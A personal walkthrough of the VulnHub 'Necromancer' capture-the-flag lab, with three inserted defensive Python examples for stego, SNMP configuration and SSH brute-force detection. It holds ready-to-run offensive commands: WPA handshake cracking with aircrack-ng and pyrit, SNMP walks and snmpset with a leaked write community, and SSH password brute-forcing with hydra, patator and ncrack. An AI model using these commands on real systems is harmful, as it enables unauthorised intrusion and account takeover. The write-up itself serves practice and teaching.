CTF – Hacking Necromancer

Capture The Flag – Necromancer. Practicing my penetration testing skills to hack a target machine.  Here’s my test environment in my own private virtual network.

I set up my Kali Linux VM on a private host-only virtual network alongside my target machine (Necromancer), which I downloaded as an OVA image from the VulnHub website.

When I started my Kali Linux virtual machine it had an assigned IP address (this will most likely be a different address when you set up your own private network). My target machine Necromancer's IP address was shown on its console when I started the Necromancer virtual machine, which saved me the time of scanning the whole /24 on my network.

Anyway, if you still want to scan your network you can use the “netdiscover” tool. If you’re not sure what options to use, simply run “netdiscover --help”. Okay, got it? Now run # netdiscover -r [Enter] to scan your private network. Here’s the result for my network. I ran “ifconfig” in my Kali to learn its assigned IP address; the other IP is most likely my target machine.

00:50:56:c0:00:01 1 60 VMware, Inc.
00:0c:29:a5:8c:67 1 60 VMware, Inc.
00:50:56:f0:0a:96 1 60 VMware, Inc.

With this information I can simply run nmap against my target IP address.


Note: IP Address renewal in 900 seconds.

Now my private network, Kali and target machine are ready. Let’s begin hacking my target machine.

From the Kali Linux virtual machine, run # nmap against the target to see what I can discover.


I found port 80 open and 1 host up. That’s a good start. Let’s run a UDP scan: # nmap -sU -n -r -T4


Now it’s getting interesting. I found UDP port 666 open, which nmap labels as the doom service.

Let’s fire up netcat against the newly discovered UDP port 666: # nc -u 666 [Enter].


Hmm. Nothing happened. I wonder what’s going on in the background. One way to find out: let’s run our network sniffing tool, Wireshark. I filtered the capture on my target machine’s IP address and found that it is trying to connect back to my Kali machine on destination port 4444.


I opened another terminal window and set up a listener on port 4444 with # nc -lvp 4444 [Enter], re-ran # nc -u 666 [Enter], then waited for output in the listening terminal window.

This is the result.


My first guess is that it is base64-encoded. I copied the text into my dumptext.txt file and ran # base64 -d -i dumptext.txt [Enter]

Woohh. I got the first flag.


I copied flag1{e6078b9b1aac915d11b9fd59791030bf} to my flags.txt file for record-keeping, just like a trophy 🙂

The value inside flag1{e6078b9b1aac915d11b9fd59791030bf} looks like an MD5 hash. I searched Google for “MD5 decrypt” and visited one of the hash lookup websites to reverse it.


I got “opensesame”. Now let’s send it to the service: # echo opensesame | nc -u 666

After running the command, it reveals flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}.


The response also points to port 80, and I notice port 666 is now closed. I verified it by re-running # nmap -sU -n -r -T4. Yes, confirmed: port 666 is not there anymore.


Open Firefox and enter the target’s URL (no need to specify port 80). I got a website with a bird image.


Reading the text doesn’t give any hint for my next move, apart from the obvious bird image. Let me download this image and see what I can dig up. I saved it as “pileoffeathers.jpg” in my necromancer folder.

Let’s examine the “pileoffeathers.jpg” file. Run # file pileoffeathers.jpg to identify it, then # exif pileoffeathers.jpg. There is no value for the color space field; that’s interesting.


Next, open the file in a hex editor to see what’s inside: # hexeditor pileoffeathers.jpg


Look what I found: a file named feathers.txt hidden inside pileoffeathers.jpg. Not hidden anymore 🙂


Running # binwalk pileoffeathers.jpg confirms there is zip archive data in the file.

Let’s run # unzip pileoffeathers.jpg; maybe it will produce the feathers.txt file.


Voilà, feathers.txt is available for me to read.

root@kali:~/necromancer# cat feathers.txt

Hmm. Another base64-encoded file. No problem, let’s decode it.

root@kali:~/necromancer# base64 -d -i feathers.txt
flag3{9ad3f62db7b91c28b68137000394639f} – Cross the chasm at /amagicbridgeappearsatthechasm

The feathers.txt file revealed flag3{9ad3f62db7b91c28b68137000394639f}. We are getting lucky here, and there is another sub-folder: /amagicbridgeappearsatthechasm
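As an added example (not the author’s code and not anything taken from the Necromancer VM), here is a Python check that automates what file, exif, hexeditor, binwalk and unzip did by hand above: it looks for bytes trailing the JPEG end-of-image marker, locates a zip local-file-header signature there, lists the archive entries and base64-decodes them. The sample image and its feathers.txt payload are constructed inside the script; the flag text and path in it are placeholders.

```python
import base64
import io
import zipfile

JPEG_SOI = b"\xff\xd8"            # start of image
JPEG_EOI = b"\xff\xd9"            # end of image: a clean JPEG stops here
ZIP_LOCAL_HEADER = b"PK\x03\x04"  # the signature binwalk reports as "Zip archive data"


def build_sample_image() -> bytes:
    """Constructed stand-in for pileoffeathers.jpg: a minimal JPEG shell with a
    zip archive glued on after the EOI marker. Not the file from the VM."""
    app0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    image = JPEG_SOI + app0 + b"\x00" * 64 + JPEG_EOI
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        hidden = b"flag{constructed-example} - next step at /constructed-path"
        zf.writestr("feathers.txt", base64.b64encode(hidden))
    return image + buf.getvalue()


def decode_if_base64(raw: bytes) -> str:
    """Return the base64-decoded text if the entry is valid base64 text,
    otherwise the raw bytes as latin-1 so nothing is lost."""
    try:
        return base64.b64decode(raw.strip(), validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return raw.decode("latin-1")


def inspect_image(data: bytes) -> dict:
    """Report bytes trailing the JPEG EOI marker and, if a zip local file header
    follows, list and decode its entries. Note: the first EOI can belong to an
    EXIF thumbnail; a production check would walk the JPEG segments instead."""
    report = {"eoi_offset": None, "trailing_bytes": 0, "zip_offset": None, "entries": {}}
    if not data.startswith(JPEG_SOI):
        return report
    eoi = data.find(JPEG_EOI)
    if eoi == -1:
        return report
    report["eoi_offset"] = eoi
    body_end = eoi + len(JPEG_EOI)
    report["trailing_bytes"] = len(data) - body_end   # anything here is not image data
    zip_off = data.find(ZIP_LOCAL_HEADER, body_end)
    if zip_off == -1:
        return report
    report["zip_offset"] = zip_off
    with zipfile.ZipFile(io.BytesIO(data[zip_off:])) as zf:
        for name in zf.namelist():
            report["entries"][name] = decode_if_base64(zf.read(name))
    return report


if __name__ == "__main__":
    sample = build_sample_image()
    print(inspect_image(sample))
```

An image viewer stops at FFD9, so the appended archive is invisible to file and exif, yet unzip still works on the .jpg because it locates the central directory from the end of the file. Counting trailing bytes after EOI is therefore a cheap first check for polyglot files before reaching for binwalk.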

Visiting that path on the website shows more text and an image.


“There must be a magical item that could protect you from the necromancer’s spell.” Is this a hint? I don’t know.

I tried the same approach as with the pileoffeathers.jpg file.

root@kali:~/necromancer# file magicbook.jpg
magicbook.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x450, frames 3
root@kali:~/necromancer# exif magicbook.jpg
Corrupt data
The data provided does not follow the specification.
ExifLoader: The data supplied does not seem to contain EXIF data.
root@kali:~/necromancer# unzip magicbook.jpg
Archive: magicbook.jpg
End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.
unzip: cannot find zipfile directory in one of magicbook.jpg or, and cannot find magicbook.jpg.ZIP, period.

No luck! Not looking good.

Going back to the last webpage, maybe running a directory brute-forcing tool with the DirBuster wordlist will help me uncover the hidden magic 🙂

root@kali:~/necromancer# dirb /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt

DIRB v2.22
By The Dark Raver

START_TIME: Tue Nov 29 14:50:41 2016
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt


*** Generating Wordlist… (this is my cue to take a quick break)

---- Scanning URL: ----
+ (CODE:200|SIZE:9676)

END_TIME: Tue Nov 29 15:02:28 2016

After a few minutes I got lucky: the result came up and found talisman.

Go to Firefox and visit the new URL we just found; Firefox then prompts to save it. I saved the file as talisman.

Note: In Firefox, the downloaded file will be saved in the Downloads folder.

I have to copy the downloaded talisman file to my working folder.

root@kali:~/necromancer# cp ~/Downloads/talisman ./

root@kali:~/necromancer# ls
dumptext.txt feathers.txt magicbook.jpg talisman
feathers.cp.txt flags.txt pileoffeathers.jpg

Let’s check the talisman file.

root@kali:~/necromancer# file talisman
talisman: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/, for GNU/Linux 2.6.32, BuildID[sha1]=2b131df906087adf163f8cba1967b3d2766e639d, not stripped

It’s a bummer: the talisman file is a 32-bit executable and I’m running Kali in 64-bit :(. Is this the end for me? Nope…

root@kali:~/necromancer# binwalk talisman

0 0x0 ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)

Nothing to find here …

root@kali:~/necromancer# ls -al
total 232
drwxr-xr-x 2 root root 4096 Nov 29 15:19 .
drwxr-xr-x 17 root root 4096 Nov 29 12:57 ..
-rw-r--r-- 1 root root 1423 Nov 29 11:47 dumptext.txt
-rw-r--r-- 1 root root 125 Nov 29 11:47 feathers.cp.txt
-rw-r--r-- 1 root root 125 May 9 2016 feathers.txt
-rw-r--r-- 1 root root 183 Nov 29 11:05 flags.txt
-rw-r--r-- 1 root root 158080 Nov 29 14:41 magicbook.jpg
-rw-r--r-- 1 root root 37289 Nov 29 11:01 pileoffeathers.jpg
-rw-r--r-- 1 root root 9676 Nov 29 15:19 talisman
root@kali:~/necromancer# chmod +x talisman
root@kali:~/necromancer# ./talisman
bash: ./talisman: No such file or directory        <-- Duh!

First, I need to add 32-bit (i386) support to Kali so I can execute this file. Time to Google how to install the 32-bit packages for Kali so I can execute the talisman file.

Took forever … to figure this out. I set up my Kali virtual machine on a host-only private network, so it has no Internet access while isolated for hacking my test environment. I had to reboot my Kali virtual machine, reconfigure its network as NAT so it could reach the Internet, and run the following commands to add the i386 architecture.

dpkg --add-architecture i386
apt-get update
apt-get install ia32-libs

NOTE: I should run another Kali virtual machine in 32-bit so I don’t have to deal with this add-architecture i386 update.

Break time, time to get a sandwich.

That didn’t help at this time. I ran another Kali virtual machine in 32-bit so I could execute the “talisman” file.

root@kali:~/KING.NET/necromancer# chmod +x talisman
root@kali:~/KING.NET/necromancer# ls -al
total 72
drwxr-xr-x 2 root root 4096 Nov 29 22:30 .
drwxr-xr-x 3 root root 4096 Nov 29 22:09 ..
-rw-r--r-- 1 root root 1423 Nov 29 22:10 dumptext.txt
-rw-r--r-- 1 root root 125 May 9 2016 feathers.txt
-rw-r--r-- 1 root root 202 Nov 29 22:16 flags.txt
-rw-r--r-- 1 root root 37289 Nov 29 22:15 pileoffeathers.jpg
-rwxr-xr-x 1 root root 9676 Nov 29 22:30 talisman

Then execute ./talisman to see what happens next.

root@kali:~/KING.NET/necromancer# ./talisman
You have found a talisman.

The talisman is cold to the touch, and has no words or symbols on it’s surface.

Do you want to wear the talisman? y

Nothing happens.

Let me run the GNU Debugger.

root@kali:~/necromancer# gdb talisman
GNU gdb (Debian 7.11.1-2+b1) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type “show copying”
and “show warranty” for details.
This GDB was configured as “x86_64-linux-gnu”.
Type “show configuration” for configuration details.
For bug reporting instructions, please see:
Find the GDB manual and other documentation resources online at:
For help, type “help”.
Type “apropos word” to search for commands related to “word”…
Reading symbols from talisman…(no debugging symbols found)…done.
(gdb) info functions [Enter]
All defined functions:

Non-debugging symbols:
0x080482d0 _init
0x08048310 printf@plt
0x08048320 __libc_start_main@plt
0x08048330 __isoc99_scanf@plt
0x08048350 _start
0x08048380 __x86.get_pc_thunk.bx
0x08048390 deregister_tm_clones
0x080483c0 register_tm_clones
0x08048400 __do_global_dtors_aux
0x08048420 frame_dummy
0x0804844b unhide
0x0804849d hide
0x080484f4 myPrintf
0x08048529 wearTalisman
0x08048a13 main
0x08048a37 chantToBreakSpell
0x08049530 __libc_csu_init
0x08049590 __libc_csu_fini
0x08049594 _fini

(gdb) break wearTalisman
Breakpoint 1 at 0x804852d
(gdb) run
Starting program: /root/KING.NET/necromancer/talisman

Breakpoint 1, 0x0804852d in wearTalisman ()
(gdb) jump chantToBreakSpell
Continuing at 0x8048a3b.
You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
Chant these words at u31337
[Inferior 1 (process 2728) exited normally]

I got flag4 and a new hint: UDP port 31337. That was a long task to finish. Moving on …

I used the MD5 lookup website again to reverse the flag4 hash and came up with the value “blackmagic”.

root@kali:~/KING.NET/necromancer# echo blackmagic | nc -u 31337

As you chant the words, a hissing sound echoes from the ice walls.

The blue aura disappears from the cave entrance.

You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.

You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.

The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.

Suddenly, you are attacked by a swarm of bats!

You aimlessly thrash at the air in front of you!

The bats continue their relentless attack, until…. silence.

Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.

Looking towards one of the torches, you see something on the cave wall.

You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in blood on the wall.



Looking good, I got flag5 and another hint.

Using the new hint, let’s go and visit this page.

This page gave me the flag6{b1c3ed8f1db4258e4dcb0ce565f6dc03} code. Easy. At the end of the page is another possible hint: “Looking closer at the skull, you can see u161 engraved into the forehead.” That is UDP port 161, SNMP. I don’t know yet whether this will be useful later on.

I downloaded the linked file “necromancer” and also the image “necromancer.jpg”.

Using binwalk to investigate the “necromancer” file.

root@kali:~/KING.NET/necromancer# binwalk necromancer

0 0x0 bzip2 compressed data, block size = 900k

The “necromancer” file is bzip2-compressed. Let’s decompress it. Again, if you need help simply run “bzip2 --help” and it will list all available options. I will use the -d option to decompress the file.

root@kali:~/KING.NET/necromancer# bzip2 -d necromancer
bzip2: Can’t guess original name for necromancer -- using necromancer.out

-rw-r--r-- 1 root root 81920 Nov 29 23:42 necromancer.out

Let’s find out about the new file “necromancer.out”. Run binwalk against this file to know more about it.

root@kali:~/KING.NET/necromancer# binwalk necromancer.out

0 0x0 POSIX tar archive (GNU), owner user name: “cer.cap”

So “necromancer.out” is a tar archive. Let’s extract it.

root@kali:~/KING.NET/necromancer# tar -xf necromancer.out [Enter]. This produces another file, “necromancer.cap”. I can open a .cap file in Wireshark to see what’s in it.

-rw-r--r-- 1 root root 80242 May 10 2016 necromancer.cap

When I opened “necromancer.cap” in Wireshark, I knew right away it is a wireless (802.11) traffic capture. See the captured image below.


I can crack this capture using the Aircrack-ng wireless cracking tool with rockyou.txt as the wordlist to discover the secret key. First, I need to unzip rockyou.txt.gz so I can use it.

root@kali:/usr/share/wordlists# gzip -d rockyou.txt.gz
root@kali:/usr/share/wordlists# ls -al rockyou.txt
-rw-r--r-- 1 root root 139921507 Mar 3 2013 rockyou.txt

Now the wordlist is ready to use. Let’s run aircrack-ng against the necromancer.cap file.

root@kali:~/KING.NET/necromancer# aircrack-ng necromancer.cap -w /usr/share/wordlists/rockyou.txt

The key “death2all” is revealed.

I can also use another tool, “pyrit”, to produce the same result. It’s nice to know alternative cracking tools.

root@kali:~/KING.NET/necromancer# pyrit -r necromancer.cap -i /usr/share/wordlists/rockyou.txt attack_passthrough
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
This code is distributed under the GNU General Public License v3+

Parsing file ‘necromancer.cap’ (1/1)…
Parsed 6 packets (6 802.11-packets), got 1 AP(s)

Picked AccessPoint c4:12:f5:0d:5e:95 (‘community’) automatically.
Tried 40002 PMKs so far; 944 PMKs per second.

The password is ‘death2all’.

Between the aircrack-ng and pyrit cracking tools, I prefer to use aircrack-ng since I used this tool in the past, during my wardriving competition at BlackHat.

OK, what to do with the newly discovered password? Remember, we have another hint about port 161 (SNMP). I think snmpwalk will help uncover more data, using the password as the SNMP community string.

root@kali:~/KING.NET/necromancer# snmpwalk -c death2all -v1
Created directory: /var/lib/snmp/mib_indexes
iso. = STRING: “You stand in front of a door.”
iso. = STRING: “The door is Locked. If you choose to defeat me, the door must be Unlocked.”
iso. = STRING: “Fear the Necromancer!”
iso. = STRING: “Locked – death2allrw!”
End of MIB

I don’t remember how to change an SNMP string, so Google search to the rescue. I found an interesting video tutorial courtesy of Keks-IT.

root@kali:~/KING.NET/necromancer# snmpset -c death2allrw -v1 iso. s Unlocked
iso. = STRING: “Unlocked”

Then re-run the walk: root@kali:~/KING.NET/necromancer# snmpwalk -c death2all -v1

Voilà! Flag7 is revealed, along with a new hint: TCP port 22 for SSH.

root@kali:~/KING.NET/necromancer# snmpwalk -c death2all -v1
iso. = STRING: “You stand in front of a door.”
iso. = STRING: “The door is unlocked! You may now enter the Necromancer’s lair!”
iso. = STRING: “Fear the Necromancer!”
iso. = STRING: “flag7{9e5494108d10bbd5f9e7ae52239546c4} – t22”
End of MIB
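The snmpwalk/snmpset exchange above works because the agent speaks SNMPv1, where the community string is the only form of authentication, the read-only walk leaked the read-write string, and a snmpset with that string was accepted. The following Python audit is added here as an example (it is not part of the post and not the VM’s real configuration): it scans constructed net-snmp snmpd.conf fragments for exactly those weaknesses, a write community, a community without a source restriction, a well-known default string, and any v1/v2c community at all, and shows a hardened fragment beside them that uses an SNMPv3 user with authentication and privacy instead. The passphrases in the hardened fragment are placeholders and the 192.0.2.0/24 range is a documentation network.

```python
from typing import Dict, List

# net-snmp directives that define SNMPv1/v2c community strings
COMMUNITY_DIRECTIVES = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"}
# Vendor defaults seen in the wild; an example policy list, not taken from the post
WELL_KNOWN = {"public", "private"}

# Constructed snmpd.conf fragment (not the VM's configuration). It mirrors what the
# snmpwalk output above implies: a read community and a write community, neither
# tied to a source address, plus a default string on a third line.
WEAK_CONF = """\
# SNMPv1/v2c communities, no source restriction, no view restriction
rocommunity death2all
rwcommunity death2allrw
rocommunity public 192.0.2.0/24
"""

# Constructed hardened fragment: SNMPv3 only, authenticated and encrypted,
# read-only user, agent bound to loopback. Passphrases are placeholders.
HARDENED_CONF = """\
createUser monitor SHA "placeholder-auth-passphrase" AES "placeholder-priv-passphrase"
rouser monitor priv
agentAddress udp:127.0.0.1:161
"""


def community_findings(lineno: int, raw: str) -> List[Dict[str, object]]:
    """Findings for one snmpd.conf line; empty for lines that define no community."""
    line = raw.split("#", 1)[0].strip()
    parts = line.split()
    if len(parts) < 2 or parts[0].lower() not in COMMUNITY_DIRECTIVES:
        return []
    directive, community = parts[0].lower(), parts[1]
    source = parts[2] if len(parts) > 2 else None  # net-snmp: absent or "default" means any host
    writable = directive.startswith("rw")

    def finding(rule: str, severity: str, reason: str) -> Dict[str, object]:
        return {"line": lineno, "rule": rule, "severity": severity,
                "directive": line, "reason": reason}

    out = []
    if writable:
        out.append(finding("rw-community", "high",
                           "write community: snmpset can change every writable OID "
                           "(the Locked -> Unlocked step above)"))
    if source is None or source.lower() == "default":
        out.append(finding("any-source", "high" if writable else "medium",
                           "no source restriction; answered from any address the agent listens on"))
    if community.lower() in WELL_KNOWN:
        out.append(finding("well-known-string", "high", f"'{community}' is a vendor default"))
    out.append(finding("v1v2c-community", "low",
                       "community strings travel in clear text and are the only authentication; "
                       "prefer an SNMPv3 user (rouser) with auth and priv"))
    return out


def audit_snmpd_conf(text: str) -> List[Dict[str, object]]:
    """Audit a whole snmpd.conf. com2sec/group/access style ACLs are not parsed here."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        findings.extend(community_findings(lineno, raw))
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        results = audit_snmpd_conf(conf)
        print(f"== {name}: {len(results)} finding(s)")
        for f in results:
            print(f"  line {f['line']} [{f['severity']}] {f['rule']}: {f['reason']}")
```

The weak fragment produces seven findings and the hardened one none; the rule that matters most on this box is the unrestricted write community, which is what turned a read-only walk into a configuration change.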

To access the SSH server I need a username and password. Maybe flag7 is a username. Let’s use the hashkiller website to reverse the flag7 hash; the result is “demonslayer”.


I’m assuming this is my SSH username. I tried to log in using demonslayer as both username and password, but no luck.

Let’s start password cracking. Tools I could use include John, Hydra, Patator, Ncrack or Medusa. Let’s use Hydra, for example.


Password cracked in under 1 minute.

Alternative password cracking tools:

root@kali:~/KING.NET/necromancer# patator ssh_login host= port=22 user=demonslayer password=FILE0 0=rockyou.txt -x ignore:mesg='Authentication failed.'

root@kali:~/KING.NET/necromancer# ncrack -p 22 --user demonslayer -v -P /usr/share/wordlists/rockyou.txt -f

All produce the same result.
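From the defender’s side, a wordlist attack like the ones above shows up in sshd’s log as a burst of “Failed password” lines from one source, and the dangerous case is the “Accepted password” that follows the burst. This added Python example (not from the post and not captured from the VM) runs that detection over constructed log lines in OpenSSH/syslog format: the host name echoes the target’s, the 192.0.2.x addresses are documentation addresses, and the threshold and window are example policy values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd lines: one source hammers the demonslayer account and then
# gets in; a second source has two ordinary typos fifteen minutes apart.
SAMPLE_LOG = """\
Nov 30 11:58:01 thenecromancer sshd[2001]: Failed password for demonslayer from 192.0.2.10 port 51000 ssh2
Nov 30 11:58:01 thenecromancer sshd[2002]: Failed password for demonslayer from 192.0.2.10 port 51001 ssh2
Nov 30 11:58:02 thenecromancer sshd[2003]: Failed password for demonslayer from 192.0.2.10 port 51002 ssh2
Nov 30 11:58:02 thenecromancer sshd[2004]: Failed password for demonslayer from 192.0.2.10 port 51003 ssh2
Nov 30 11:58:02 thenecromancer sshd[2005]: Failed password for demonslayer from 192.0.2.10 port 51004 ssh2
Nov 30 11:58:03 thenecromancer sshd[2006]: Failed password for demonslayer from 192.0.2.10 port 51005 ssh2
Nov 30 11:58:03 thenecromancer sshd[2007]: Failed password for demonslayer from 192.0.2.10 port 51006 ssh2
Nov 30 11:58:03 thenecromancer sshd[2008]: Failed password for demonslayer from 192.0.2.10 port 51007 ssh2
Nov 30 11:58:04 thenecromancer sshd[2009]: Accepted password for demonslayer from 192.0.2.10 port 51008 ssh2
Nov 30 12:30:00 thenecromancer sshd[2100]: Failed password for demonslayer from 192.0.2.77 port 40000 ssh2
Nov 30 12:45:00 thenecromancer sshd[2101]: Accepted password for demonslayer from 192.0.2.77 port 40001 ssh2
Nov 30 12:46:10 thenecromancer sshd[2102]: Failed password for invalid user admin from 192.0.2.77 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<source>\S+) port \d+"
)


def parse_line(line: str):
    """Turn one sshd line into an event dict, or None for lines we do not care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; relative ordering is all the window logic needs
    return {
        "time": datetime.strptime(m["ts"], "%b %d %H:%M:%S"),
        "result": m["result"],
        "user": m["user"],
        "source": m["source"],
    }


def detect_bruteforce(log_text: str, threshold: int = 6, window_seconds: int = 60):
    """Flag every source that reaches `threshold` failures inside a sliding window
    and record whether a successful login followed the burst within that window."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    by_source = defaultdict(list)
    for e in events:
        by_source[e["source"]].append(e)

    window = timedelta(seconds=window_seconds)
    alerts = []
    for source, evs in by_source.items():
        evs.sort(key=lambda e: e["time"])
        recent = deque()  # failure timestamps still inside the window
        alert = None
        for e in evs:
            while recent and e["time"] - recent[0] > window:
                recent.popleft()
            if e["result"] == "Failed":
                recent.append(e["time"])
                if len(recent) >= threshold:
                    if alert is None:
                        alert = {"source": source, "user": e["user"], "first": recent[0],
                                 "last": e["time"], "failures": 0, "success_after_burst": False}
                        alerts.append(alert)
                    alert["last"] = e["time"]
            elif alert is not None and e["time"] - alert["last"] <= window:
                # a password accepted right after the burst: treat as a likely compromise
                alert["success_after_burst"] = True
        if alert is not None:
            alert["failures"] = sum(1 for e in evs if e["result"] == "Failed")
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        print(a)
```

The two typos from the second source never reach the threshold, so only the first source is reported, with success_after_burst set; that flag is the one worth paging on, since the password was clearly guessed. Rate limiting (fail2ban or sshd MaxAuthTries) and key-only authentication remove the condition entirely.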

Now, let’s use our discovered username “demonslayer” and password “12345678” to connect via SSH (port 22).

root@kali:~/KING.NET/necromancer# ssh demonslayer@
The authenticity of host ‘ (’ can’t be established.
ECDSA key fingerprint is SHA256:sIaywVX5Ba0Qbo/sFM3Gf9cY9SMJpHk2oTZmOHKTtLU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘’ (ECDSA) to the list of known hosts.
demonslayer@’s password:


Listing the directory shows flag8.txt.

$ ls
$ cat flag8.txt
You enter the Necromancer’s Lair!

A stench of decay fills this place.

Jars filled with parts of creatures litter the bookshelves.

A fire with flames of green burns coldly in the distance.

Standing in the middle of the room with his back to you is the Necromancer.

In front of him lies a corpse, indistinguishable from any living creature you have seen before.

He holds a staff in one hand, and the flickering object in the other.

“You are a fool to follow me here! Do you not know who I am!”

The necromancer turns to face you. Dark words fill the air!

“You are damned already my friend. Now prepare for your own death!”

Defend yourself! Counter attack the Necromancer’s spells at u777!

I don’t see my flag8 in this text, though there is a hint of UDP port 777.

$ nc -u localhost 777

** You only have 3 hitpoints left! **

Google search is your best source to get the answer. 

** You only have 3 hitpoints left! **

Defend yourself from the Necromancer’s Spells!

Where do the Black Robes practice magic of the Greater Path? Kelewan

** You only have 3 hitpoints left! **

Defend yourself from the Necromancer’s Spells!

Who did Johann Faust VIII make a deal with? Mephistopheles


** You only have 3 hitpoints left! **

Defend yourself from the Necromancer’s Spells!

Who is tricked into passing the Ninth Gate? Hedge


A great flash of light knocks you to the ground; momentarily blinding you!

As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.

An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.

The room is silent.

You walk over to where the Necromancer once stood.

On the ground is a small vile.

$ ls -al
total 44
drwxr-xr-x 3 demonslayer demonslayer 512 Nov 30 12:01 .
drwxr-xr-x 3 root wheel 512 May 11 2016 ..
-rw-r--r-- 1 demonslayer demonslayer 87 May 11 2016 .Xdefaults
-rw-r--r-- 1 demonslayer demonslayer 773 May 11 2016 .cshrc
-rw-r--r-- 1 demonslayer demonslayer 103 May 11 2016 .cvsrc
-rw-r--r-- 1 demonslayer demonslayer 359 May 11 2016 .login
-rw-r--r-- 1 demonslayer demonslayer 175 May 11 2016 .mailrc
-rw-r--r-- 1 demonslayer demonslayer 218 May 11 2016 .profile
-rw-r--r-- 1 demonslayer demonslayer 196 Nov 30 12:00 .smallvile
drwx------ 2 demonslayer demonslayer 512 May 11 2016 .ssh
-rw-r--r-- 1 demonslayer demonslayer 706 May 11 2016 flag8.txt

$ cat .smallvile
You pick up the small vile.

Inside of it you can see a green liquid.

Opening the vile releases a pleasant odour into the air.

You drink the elixir and feel a great power within your veins!

$ id
uid=1000(demonslayer) gid=1000(demonslayer) groups=1000(demonslayer)

$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:

User demonslayer may run the following commands on thenecromancer:
(ALL) NOPASSWD: /bin/cat /root/flag11.txt

$ sudo /bin/cat /root/flag11.txt


All the flags.

root@kali:~/KING.NET/necromancer# cat flags.txt
flag3{9ad3f62db7b91c28b68137000394639f} – Cross the chasm at /amagicbridgeappearsatthechasm

I’m still honing my penetration testing skills and will continue to learn from other smart hackers out there. I’m catching up …


Useful links:


